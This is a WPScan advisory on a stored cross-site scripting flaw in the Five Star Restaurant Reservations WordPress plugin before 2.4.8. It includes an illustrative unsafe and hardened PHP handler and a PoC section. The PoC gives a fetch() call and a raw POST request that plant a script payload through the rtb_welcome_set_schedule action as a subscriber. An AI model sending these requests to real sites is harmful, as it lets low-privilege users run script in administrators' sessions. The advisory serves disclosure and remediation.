wpvulndb. Krzysztof Zając. WPVDB-ID: 306ECF09-FDF0-449C-930C-9DFA58F0EFC2
History: Dec 21, 2021 - 12:00 a.m.

Five Star Restaurant Reservations < 2.4.8 - Subscriber+ Stored Cross-Site Scripting

2021-12-21 00:00:00
Krzysztof Zając
wpscan.com
6

EPSS: 0.001 (Low)
EPSS Percentile: 25.0%

The plugin does not perform capability or CSRF (nonce) checks in the rtb_welcome_set_schedule AJAX action, so any authenticated user can call it. Because the submitted schedule is neither sanitised on input nor escaped on output, a user with a role as low as subscriber can store a payload that performs Cross-Site Scripting against logged-in admins when they open the plugin's settings page.
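The three missing controls named above (nonce check, capability check, sanitisation plus output escaping) are easiest to see side by side. The following is an added illustration written for this advisory, not the plugin's own code: the action name rtb_welcome_set_schedule and the schedule shape (rule name, weekdays, start/end time) come from the advisory's PoC, while the function bodies, the option name rtb_schedule_open, the nonce action rtb_set_schedule and the request field nonce are assumptions. The first handler reproduces the described pattern and is deliberately not registered; the second is the hardened form.

```php
<?php
// Added illustration (not the plugin's code). Names marked "assumed" are not
// taken from the advisory.

// --- Pattern the advisory describes (shown only; NOT registered) ---
function rtb_welcome_set_schedule_unsafe() {
    // 1. No nonce check: a third-party page can make a logged-in user's browser send this (CSRF).
    // 2. No capability check: any authenticated user, subscriber included, may call it.
    // 3. Attacker-controlled JSON keys are stored verbatim and later echoed into the settings page.
    $schedule = json_decode( wp_unslash( $_POST['schedule_open'] ), true );
    update_option( 'rtb_schedule_open', $schedule ); // option name assumed
    wp_send_json_success();
}

// --- Hardened handler ---
function rtb_welcome_set_schedule_safe() {
    // CSRF: caller must present a nonce created with wp_create_nonce( 'rtb_set_schedule' )
    // on the settings page and sent in the 'nonce' field (action and field name assumed).
    check_ajax_referer( 'rtb_set_schedule', 'nonce' );

    // Authorisation: only users who may manage options can change the schedule.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient permissions', 403 );
    }

    $raw     = isset( $_POST['schedule_open'] ) ? wp_unslash( $_POST['schedule_open'] ) : '';
    $decoded = json_decode( $raw, true );
    if ( ! is_array( $decoded ) ) {
        wp_send_json_error( 'invalid schedule', 400 );
    }

    // Input validation: rebuild the structure from an allowlist rather than trusting keys.
    $clean = rtb_sanitize_schedule( $decoded );
    update_option( 'rtb_schedule_open', $clean );
    wp_send_json_success( $clean );
}
add_action( 'wp_ajax_rtb_welcome_set_schedule', 'rtb_welcome_set_schedule_safe' );

function rtb_sanitize_schedule( array $decoded ) {
    $weekdays = array( 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'sunday' );
    $clean    = array();
    foreach ( $decoded as $name => $rule ) {
        // Rule names are user input: sanitize_key() lowercases and strips everything
        // outside [a-z0-9_-], so quotes and angle brackets never reach storage.
        $name = sanitize_key( $name );
        if ( '' === $name || ! is_array( $rule ) ) {
            continue;
        }
        $entry = array( 'weekdays' => array(), 'time' => array( 'start' => '', 'end' => '' ) );
        foreach ( $weekdays as $day ) {
            if ( ! empty( $rule['weekdays'][ $day ] ) ) {
                $entry['weekdays'][ $day ] = '1';
            }
        }
        foreach ( array( 'start', 'end' ) as $k ) {
            $t = isset( $rule['time'][ $k ] ) ? sanitize_text_field( $rule['time'][ $k ] ) : '';
            // Accept only "h:mm AM/PM" (format assumed from the PoC); anything else becomes empty.
            $entry['time'][ $k ] = preg_match( '/^\d{1,2}:\d{2} [AP]M$/', $t ) ? $t : '';
        }
        $clean[ $name ] = $entry;
    }
    return $clean;
}

// Output escaping on the settings page: a stored value is still untrusted when rendered.
function rtb_render_schedule_rows() {
    foreach ( (array) get_option( 'rtb_schedule_open', array() ) as $name => $rule ) {
        printf(
            '<tr><td>%s</td><td>%s</td></tr>',
            esc_html( $name ),
            esc_html( $rule['time']['start'] . ' - ' . $rule['time']['end'] )
        );
    }
}
```

Each layer is independent: the nonce stops cross-site requests, the capability check stops low-privilege accounts, the allowlist keeps unexpected keys out of the database, and esc_html() on render means that even data stored before the fix cannot execute as script.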

PoC

As a subscriber:

    fetch("https://example.com/wp-admin/admin-ajax.php", {
      "headers": { "content-type": "application/x-www-form-urlencoded" },
      "body": new URLSearchParams({
        "action": "rtb_welcome_set_schedule",
        "schedule_open": '{"\">": {"weekdays":{"wednesday":"1"},"time":{"start":"1:45 AM","end":""}}}'
      }),
      "method": "POST",
      "credentials": "include"
    })

Equivalent raw request:

    POST /wp-admin/admin-ajax.php HTTP/1.1
    Accept: */*
    Accept-Language: en-GB,en;q=0.5
    Accept-Encoding: gzip, deflate
    content-type: application/x-www-form-urlencoded
    Content-Length: 316
    Connection: close
    Cookie: [any authenticated user]

    action=rtb_welcome_set_schedule&schedule_open=%7B%22%5C%22%3E%3Cscript%3Eif+%28%21window.alreadyExploited%29+alert%28%2FXSS%2F%29%3B+window.alreadyExploited+%3D+1%3B%3C%2Fscript%3E%22%3A+%7B%22weekdays%22%3A%7B%22wednesday%22%3A%221%22%7D%2C%22time%22%3A%7B%22start%22%3A%221%3A45+AM%22%2C%22end%22%3A%22%22%7D%7D%7D

The XSS is then triggered in the plugin's settings page: https://example.com/wp-admin/admin.php?page=rtb-settings

CPE Name: restaurant-reservations
Operator: lt
Version: 2.4.8

